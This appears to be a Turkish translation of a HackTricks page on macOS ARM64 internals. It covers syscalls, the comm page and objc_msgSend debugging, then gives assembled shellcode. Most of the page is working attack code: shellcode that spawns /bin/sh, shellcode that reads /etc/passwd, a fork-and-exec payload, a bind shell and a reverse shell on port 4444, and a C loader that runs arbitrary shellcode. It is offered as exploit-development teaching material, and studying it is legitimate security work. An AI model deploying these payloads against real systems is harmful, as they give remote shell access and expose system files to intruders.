{% hint style="success" %} Bazen, libsystem_kernel.dylib dosyasından derlenmiş kodu kontrol etmek, kaynak kodunu kontrol etmekten daha kolay olabilir çünkü birkaç sistem çağrısının (BSD ve Mach) kodu betikler aracılığıyla oluşturulur (kaynak kodundaki yorumlara bakın) iken dylib dosyasında neyin çağrıldığını bulabilirsiniz. {% endhint %}

machdep çağrıları

XNU, makine bağımlı olarak adlandırılan başka bir çağrı türünü destekler. Bu çağrıların sayısı mimariye bağlıdır ve ne çağrılar ne de numaraların sabit kalması garanti edilmez.

comm sayfası

Bu, her kullanıcı işleminin adres alanına eşlenmiş olan bir çekirdek sahibi bellek sayfasıdır. Bu, kullanıcı modundan çekirdek alanına geçişi, bu geçişin çok verimsiz olacağı çekirdek hizmetleri için sistem çağrılarını kullanmaktan daha hızlı yapmayı amaçlar.

Örneğin, gettimeofdate çağrısı, timeval değerini doğrudan comm sayfasından okur.

objc_msgSend

Bu fonksiyonun Objective-C veya Swift programlarında sıkça kullanıldığını görmek çok yaygındır. Bu fonksiyon, bir Objective-C nesnesinin bir yöntemini çağırmayı sağlar.

Parametreler (daha fazla bilgi için dokümantasyona bakın):

  • x0: self -> Örneğin işaretçisi
  • x1: op -> Yöntemin seçicisi
  • x2... -> Çağrılan yöntemin diğer argümanları

Bu nedenle, bu fonksiyona yapılan dallanmadan önce kesme noktası koyarsanız, lldb'de neyin çağrıldığını kolayca bulabilirsiniz (bu örnekte, nesne NSConcreteTask'tan bir nesneyi çağırır ve bir komut çalıştırır).

(lldb) po $x0
<NSConcreteTask: 0x1052308e0>

(lldb) x/s $x1
0x1736d3a6e: "launch"

(lldb) po [$x0 launchPath]
/bin/sh

(lldb) po [$x0 arguments]
<__NSArrayI 0x1736801e0>(
-c,
whoami
)

Kabuk Kodları

Derlemek için:

as -o shell.o shell.s
ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib

# You could also use this
ld -o shell shell.o -syslibroot $(xcrun -sdk macosx --show-sdk-path) -lSystem

Bytes'ı çıkarmak için:

# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/extract.sh
for c in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
echo -n '\\x'$c
done

<özet>Shellcode'u test etmek için C kodu</özet>

// code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c
// gcc loader.c -o loader
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

int (*sc)();

char shellcode[] = "<INSERT SHELLCODE HERE>";

int main(int argc, char **argv) {
printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode));

void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);

if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
printf("[+] SUCCESS: mmap\n");
printf("    |-> Return = %p\n", ptr);

void *dst = memcpy(ptr, shellcode, sizeof(shellcode));
printf("[+] SUCCESS: memcpy\n");
printf("    |-> Return = %p\n", dst);

int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ);

if (status == -1) {
perror("mprotect");
exit(-1);
}
printf("[+] SUCCESS: mprotect\n");
printf("    |-> Return = %d\n", status);

printf("[>] Trying to execute shellcode...\n");

sc = ptr;
sc();

return 0;
}

Shell

buradan alınmış ve açıklanmıştır.

{% tabs %} {% tab title="adr ile" %}

.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main         ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2              ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).

_main:
adr  x0, sh_path  ; This is the address of "/bin/sh".
mov  x1, xzr      ; Clear x1, because we need to pass NULL as the second argument to execve.
mov  x2, xzr      ; Clear x2, because we need to pass NULL as the third argument to execve.
mov  x16, #59     ; Move the execve syscall number (59) into x16.
svc  #0x1337      ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.

sh_path: .asciz "/bin/sh"

{% endtab %}

{% tab title="yığınla" %}

.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main         ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2              ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).

_main:
; We are going to build the string "/bin/sh" and place it on the stack.

mov  x1, #0x622F  ; Move the lower half of "/bi" into x1. 0x62 = 'b', 0x2F = '/'.
movk x1, #0x6E69, lsl #16 ; Move the next half of "/bin" into x1, shifted left by 16. 0x6E = 'n', 0x69 = 'i'.
movk x1, #0x732F, lsl #32 ; Move the first half of "/sh" into x1, shifted left by 32. 0x73 = 's', 0x2F = '/'.
movk x1, #0x68, lsl #48   ; Move the last part of "/sh" into x1, shifted left by 48. 0x68 = 'h'.

str  x1, [sp, #-8] ; Store the value of x1 (the "/bin/sh" string) at the location `sp - 8`.

; Prepare arguments for the execve syscall.

mov  x1, #8       ; Set x1 to 8.
sub  x0, sp, x1   ; Subtract x1 (8) from the stack pointer (sp) and store the result in x0. This is the address of "/bin/sh" string on the stack.
mov  x1, xzr      ; Clear x1, because we need to pass NULL as the second argument to execve.
mov  x2, xzr      ; Clear x2, because we need to pass NULL as the third argument to execve.

; Make the syscall.

mov  x16, #59     ; Move the execve syscall number (59) into x16.
svc  #0x1337      ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.

{% endtab %}

{% tab title="linux için adr ile" %}

; From https://8ksec.io/arm64-reversing-and-exploitation-part-5-writing-shellcode-8ksec-blogs/
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main         ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2              ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).

_main:
adr  x0, sh_path  ; This is the address of "/bin/sh".
mov  x1, xzr      ; Clear x1, because we need to pass NULL as the second argument to execve.
mov  x2, xzr      ; Clear x2, because we need to pass NULL as the third argument to execve.
mov  x16, #59     ; Move the execve syscall number (59) into x16.
svc  #0x1337      ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.

sh_path: .asciz "/bin/sh"

Cat ile oku

Amacımız execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL) komutunu çalıştırmak, bu yüzden ikinci argüman (x1) parametrelerin bir dizisi olmalıdır (bellekte bu adreslerin bir yığını anlamına gelir).

.section __TEXT,__text     ; Begin a new section of type __TEXT and name __text
.global _main              ; Declare a global symbol _main
.align 2                   ; Align the beginning of the following code to a 4-byte boundary

_main:
; Prepare the arguments for the execve syscall
sub sp, sp, #48        ; Allocate space on the stack
mov x1, sp             ; x1 will hold the address of the argument array
adr x0, cat_path
str x0, [x1]           ; Store the address of "/bin/cat" as the first argument
adr x0, passwd_path    ; Get the address of "/etc/passwd"
str x0, [x1, #8]       ; Store the address of "/etc/passwd" as the second argument
str xzr, [x1, #16]     ; Store NULL as the third argument (end of arguments)

adr x0, cat_path
mov x2, xzr            ; Clear x2 to hold NULL (no environment variables)
mov x16, #59           ; Load the syscall number for execve (59) into x8
svc 0                  ; Make the syscall


cat_path: .asciz "/bin/cat"
.align 2
passwd_path: .asciz "/etc/passwd"

Ana işlem öldürülmezken bir çataldan sh ile komut çağırma

.section __TEXT,__text     ; Begin a new section of type __TEXT and name __text
.global _main              ; Declare a global symbol _main
.align 2                   ; Align the beginning of the following code to a 4-byte boundary

_main:
; Prepare the arguments for the fork syscall
mov x16, #2            ; Load the syscall number for fork (2) into x8
svc 0                  ; Make the syscall
cmp x1, #0             ; In macOS, if x1 == 0, it's parent process, https://opensource.apple.com/source/xnu/xnu-7195.81.3/libsyscall/custom/__fork.s.auto.html
beq _loop              ; If not child process, loop

; Prepare the arguments for the execve syscall

sub sp, sp, #64        ; Allocate space on the stack
mov x1, sp             ; x1 will hold the address of the argument array
adr x0, sh_path
str x0, [x1]           ; Store the address of "/bin/sh" as the first argument
adr x0, sh_c_option    ; Get the address of "-c"
str x0, [x1, #8]       ; Store the address of "-c" as the second argument
adr x0, touch_command  ; Get the address of "touch /tmp/lalala"
str x0, [x1, #16]      ; Store the address of "touch /tmp/lalala" as the third argument
str xzr, [x1, #24]     ; Store NULL as the fourth argument (end of arguments)

adr x0, sh_path
mov x2, xzr            ; Clear x2 to hold NULL (no environment variables)
mov x16, #59           ; Load the syscall number for execve (59) into x8
svc 0                  ; Make the syscall


_exit:
mov x16, #1            ; Load the syscall number for exit (1) into x8
mov x0, #0             ; Set exit status code to 0
svc 0                  ; Make the syscall

_loop: b _loop

sh_path: .asciz "/bin/sh"
.align 2
sh_c_option: .asciz "-c"
.align 2
touch_command: .asciz "touch /tmp/lalala"

Bağlama kabuğu

Bağlama kabuğu https://raw.githubusercontent.com/daem0nc0re/macOS_ARM64_Shellcode/master/bindshell.s üzerinden 4444 numaralı bağlantı noktasında.

.section __TEXT,__text
.global _main
.align 2
_main:
call_socket:
// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)
mov  x16, #97
lsr  x1, x16, #6
lsl  x0, x1, #1
mov  x2, xzr
svc  #0x1337

// save s
mvn  x3, x0

call_bind:
/*
* bind(s, &sockaddr, 0x10)
*
* struct sockaddr_in {
*     __uint8_t       sin_len;     // sizeof(struct sockaddr_in) = 0x10
*     sa_family_t     sin_family;  // AF_INET = 2
*     in_port_t       sin_port;    // 4444 = 0x115C
*     struct  in_addr sin_addr;    // 0.0.0.0 (4 bytes)
*     char            sin_zero[8]; // Don't care
* };
*/
mov  x1, #0x0210
movk x1, #0x5C11, lsl #16
str  x1, [sp, #-8]
mov  x2, #8
sub  x1, sp, x2
mov  x2, #16
mov  x16, #104
svc  #0x1337

call_listen:
// listen(s, 2)
mvn  x0, x3
lsr  x1, x2, #3
mov  x16, #106
svc  #0x1337

call_accept:
// c = accept(s, 0, 0)
mvn  x0, x3
mov  x1, xzr
mov  x2, xzr
mov  x16, #30
svc  #0x1337

mvn  x3, x0
lsr  x2, x16, #4
lsl  x2, x2, #2

call_dup:
// dup(c, 2) -> dup(c, 1) -> dup(c, 0)
mvn  x0, x3
lsr  x2, x2, #1
mov  x1, x2
mov  x16, #90
svc  #0x1337
mov  x10, xzr
cmp  x10, x2
bne  call_dup

call_execve:
// execve("/bin/sh", 0, 0)
mov  x1, #0x622F
movk x1, #0x6E69, lsl #16
movk x1, #0x732F, lsl #32
movk x1, #0x68, lsl #48
str  x1, [sp, #-8]
mov	 x1, #8
sub  x0, sp, x1
mov  x1, xzr
mov  x2, xzr
mov  x16, #59
svc  #0x1337

Ters kabuk

https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/reverseshell.s adresinden, 127.0.0.1:4444 adresine revshell'i alın.

.section __TEXT,__text
.global _main
.align 2
_main:
call_socket:
// s = socket(AF_INET = 2, SOCK_STREAM = 1, 0)
mov  x16, #97
lsr  x1, x16, #6
lsl  x0, x1, #1
mov  x2, xzr
svc  #0x1337

// save s
mvn  x3, x0

call_connect:
/*
* connect(s, &sockaddr, 0x10)
*
* struct sockaddr_in {
*     __uint8_t       sin_len;     // sizeof(struct sockaddr_in) = 0x10
*     sa_family_t     sin_family;  // AF_INET = 2
*     in_port_t       sin_port;    // 4444 = 0x115C
*     struct  in_addr sin_addr;    // 127.0.0.1 (4 bytes)
*     char            sin_zero[8]; // Don't care
* };
*/
mov  x1, #0x0210
movk x1, #0x5C11, lsl #16
movk x1, #0x007F, lsl #32
movk x1, #0x0100, lsl #48
str  x1, [sp, #-8]
mov  x2, #8
sub  x1, sp, x2
mov  x2, #16
mov  x16, #98
svc  #0x1337

lsr  x2, x2, #2

call_dup:
// dup(s, 2) -> dup(s, 1) -> dup(s, 0)
mvn  x0, x3
lsr  x2, x2, #1
mov  x1, x2
mov  x16, #90
svc  #0x1337
mov  x10, xzr
cmp  x10, x2
bne  call_dup

call_execve:
// execve("/bin/sh", 0, 0)
mov  x1, #0x622F
movk x1, #0x6E69, lsl #16
movk x1, #0x732F, lsl #32
movk x1, #0x68, lsl #48
str  x1, [sp, #-8]
mov	 x1, #8
sub  x0, sp, x1
mov  x1, xzr
mov  x2, xzr
mov  x16, #59
svc  #0x1337

<özet>

AWS hacklemeyi sıfırdan kahramana öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı) ile!

Diğer HackTricks'i destekleme yolları: